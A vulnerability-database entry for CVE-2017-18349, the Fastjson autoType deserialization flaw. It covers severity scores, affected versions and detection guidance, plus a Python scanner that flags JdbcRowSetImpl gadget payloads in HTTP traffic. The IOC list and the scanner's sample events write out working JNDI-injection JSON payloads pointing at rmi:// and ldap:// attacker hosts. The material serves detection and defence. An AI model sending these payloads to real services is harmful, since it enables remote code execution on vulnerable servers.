CVE-2017-18349
published 2018-10-23


Priority: P1 86
Severity: critical, 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitation: in the wild (ITW), public exploit, VulnCheck KEV
EPSS: 38.97% (98.4th percentile)
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.

Affected

3 ranges

Vendor     Product    Version range   Fixed in
alibaba    fastjson   < 1.2.48        1.2.48
alibaba    fastjson   < 1.2.25        1.2.25
pippo      pippo

Detection & IOCs (extracted from sources)

url: /json
url: /api/json
url: /parse
url: /deserialize
command: {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://<attacker>/", "autoCommit": true}
command: {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://<attacker>/", "autoCommit": true}
other: com.sun.rowset.JdbcRowSetImpl
sigma:
  condition: contains(interactsh_protocol,'dns') AND contains(content_type,'application/json') AND contains_all(body,'autoCommit','set property error')
  • Look for HTTP POST requests to /json, /api/json, /parse, or /deserialize endpoints with Content-Type: application/json containing the @type key set to com.sun.rowset.JdbcRowSetImpl and a dataSourceName field containing an rmi:// or ldap:// URI pointing to an attacker-controlled host.
  • Detect the error response string 'set property error' alongside 'autoCommit' in the response body, which indicates the vulnerable Fastjson code path was triggered.
  • Monitor for outbound DNS or LDAP/RMI connections originating from the Java process after receiving a JSON payload containing @type with com.sun.rowset.JdbcRowSetImpl — this indicates successful JNDI injection triggering an out-of-band callback.
  • Flag any JSON body containing the literal string @type with value com.sun.rowset.JdbcRowSetImpl regardless of nesting depth (top-level, inside 'data' key, or inside 'b' key), as the exploit template demonstrates multiple wrapping variants.
  • This vulnerability exists because of Fastjson's autoType feature mishandling @type keys; detection should also cover LDAP-based JNDI injection payloads in the dataSourceName field, as the same class is exploitable via ldap:// URIs.
  • The Nuclei template uses interactsh (OOB/OAST) for DNS callback detection; this detection method requires a reachable interactsh server and will not fire in air-gapped or DNS-filtered environments.
  • The exploit is demonstrated against Pippo's /json endpoint, but the vulnerable parseObject function is in Fastjson itself; any application using Fastjson before 1.2.25 with autoType enabled is affected regardless of framework or endpoint path.
  • The fix in 1.2.25 was incomplete; Fastjson before 1.2.48 remains vulnerable to autoType mishandling leading to JNDI injection, and a further bypass is tracked as CVE-2022-25845.
  • The Nuclei template sets stop-at-first-match, so scanning stops after the first path that matches; to confirm the exposure of every endpoint in production, test all candidate paths (/json, /api/json, /parse, /deserialize) independently.
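The detection bullets above can be turned into a small request/response scanner. The block below is an added example, not code from the source page, from Fastjson or from Pippo: it walks a JSON body to any nesting depth (top-level, under a 'data' key, inside a list under 'b', or anywhere else), flags objects whose @type is com.sun.rowset.JdbcRowSetImpl, extracts rmi:// or ldap:// dataSourceName targets, and checks the response body for the 'set property error' / 'autoCommit' pair. The sample events, host addresses and field names in SAMPLE_EVENTS are constructed for illustration; nothing here is real traffic.

```python
"""Scanner for CVE-2017-18349-style Fastjson JNDI payloads (added example)."""
import json
import re
from typing import Any, Iterator

# Endpoint paths named in the detection guidance; a hit elsewhere is still an alert,
# because the flaw is in Fastjson's parseObject, not in any particular route.
SUSPECT_PATHS = ("/json", "/api/json", "/parse", "/deserialize")
GADGET_CLASS = "com.sun.rowset.JdbcRowSetImpl"
JNDI_URI = re.compile(r"^(rmi|ldap|ldaps)://", re.IGNORECASE)


def walk(node: Any) -> Iterator[dict]:
    """Yield every JSON object in the tree, whatever its nesting depth."""
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from walk(value)
    elif isinstance(node, list):
        for value in node:
            yield from walk(value)


def find_jndi_gadgets(body: str) -> list[dict]:
    """One finding per object with @type == JdbcRowSetImpl.

    'jndi' is True only when dataSourceName carries an rmi:// or ldap:// URI,
    which is the part that actually causes the outbound JNDI lookup.
    """
    try:
        tree = json.loads(body)
    except json.JSONDecodeError:
        # Fastjson accepts input a strict parser rejects; don't let a parse
        # failure hide the gadget class name when it is present verbatim.
        if GADGET_CLASS in body:
            return [{"dataSourceName": None, "jndi": False, "parsed": False}]
        return []
    findings = []
    for obj in walk(tree):
        if obj.get("@type") == GADGET_CLASS:
            dsn = obj.get("dataSourceName")
            findings.append({
                "dataSourceName": dsn,
                "jndi": isinstance(dsn, str) and bool(JNDI_URI.match(dsn)),
                "parsed": True,
            })
    return findings


def response_indicates_trigger(response_body: str) -> bool:
    """The error string pair the page associates with the vulnerable code path."""
    return "set property error" in response_body and "autoCommit" in response_body


def scan(events: list[dict]) -> list[dict]:
    """Run the checks over captured HTTP events (method, path, content_type, body, response)."""
    alerts = []
    for event in events:
        if event.get("method") != "POST" or not event.get("body"):
            continue
        gadgets = find_jndi_gadgets(event["body"])
        if not gadgets:
            continue
        alerts.append({
            "path": event["path"],
            "known_path": event["path"] in SUSPECT_PATHS,
            "json_content_type": "application/json" in event.get("content_type", ""),
            "jndi_targets": [g["dataSourceName"] for g in gadgets if g["jndi"]],
            "triggered": response_indicates_trigger(event.get("response", "")),
        })
    return alerts


# Constructed sample events (hypothetical hosts from the 203.0.113.0/24 documentation range).
SAMPLE_EVENTS = [
    {"method": "POST", "path": "/json", "content_type": "application/json",
     "body": '{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://203.0.113.5:1099/Exploit", "autoCommit": true}',
     "response": '{"error": "set property error, autoCommit"}'},
    {"method": "POST", "path": "/api/json", "content_type": "application/json",
     "body": '{"data": {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://203.0.113.5:1389/a", "autoCommit": true}}',
     "response": ""},
    {"method": "POST", "path": "/upload", "content_type": "text/plain",
     "body": '{"b": [{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://203.0.113.5:1389/b", "autoCommit": true}]}',
     "response": ""},
    {"method": "POST", "path": "/json", "content_type": "application/json",
     "body": '{"name": "alice", "autoCommit": true}', "response": "ok"},
    {"method": "GET", "path": "/json", "content_type": "", "body": "", "response": ""},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The third sample deliberately hits a path outside the listed endpoints with a non-JSON Content-Type and still produces an alert; the known_path and json_content_type fields are kept as context for triage rather than used as filters, since any Fastjson parseObject call site is a candidate. A finding with jndi False (for example a jdbc: dataSourceName) is still worth a look, because the gadget class alone has no legitimate reason to appear in client-supplied JSON.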

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             v3.0      9.8     CRITICAL   CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd             v2.0      10.0    CRITICAL   AV:N/AC:L/Au:N/C:C/I:C/A:C
ghsa                      9.8     CRITICAL
osv                       9.8     CRITICAL
vulncheck                 9.8     CRITICAL
vendor_redhat             9.8     CRITICAL